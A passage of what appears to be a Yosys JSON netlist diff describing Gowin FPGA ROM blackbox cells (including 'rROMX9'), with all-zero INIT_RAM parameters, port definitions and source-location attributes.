"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC" + }, + "ports": { + "CLK": { + "direction": "input", + "bits": [ 2 ] + }, + "CE": { + "direction": "input", + "bits": [ 3 ] + }, + "OCE": { + "direction": "input", + "bits": [ 4 ] + }, + "RESET": { + "direction": "input", + "bits": [ 5 ] + }, + "AD": { + "direction": "input", + "bits": [ 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ] + }, + "BLKSEL": { + "direction": "input", + "bits": [ 20, 21, 22 ] + }, + "DO": { + "direction": "output", + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54 ] + } + }, + "cells": { + }, + "netnames": { + "AD": { + "hide_name": 0, + "bits": [ 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:586.14-586.16" + } + }, + "BLKSEL": { + "hide_name": 0, + "bits": [ 20, 21, 22 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:587.13-587.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:583.12-583.14" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:583.7-583.10" + } + }, + "DO": { + "hide_name": 0, + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:588.15-588.17" + } + }, + "OCE": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:584.7-584.10" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:585.7-585.12" + } + } + } + }, + "rROMX9": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:592.1-667.10" + }, + "parameter_default_values": { + "BIT_WIDTH": "00000000000000000000000000100100", + "BLK_SEL": "000", + "INIT_RAM_00": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE": "0", + "RESET_MODE": "SYNC" + }, + "ports": { + "CLK": { + "direction": "input", + "bits": [ 2 ] + }, + "CE": { + "direction": "input", + "bits": [ 3 ] + }, + "OCE": { + "direction": "input", + "bits": [ 4 ] + }, + "RESET": { + "direction": "input", + "bits": [ 5 ] + }, + "AD": { + "direction": "input", + "bits": [ 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ] + }, + "BLKSEL": { + "direction": "input", + "bits": [ 20, 21, 22 ] + }, + "DO": { + "direction": "output", + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 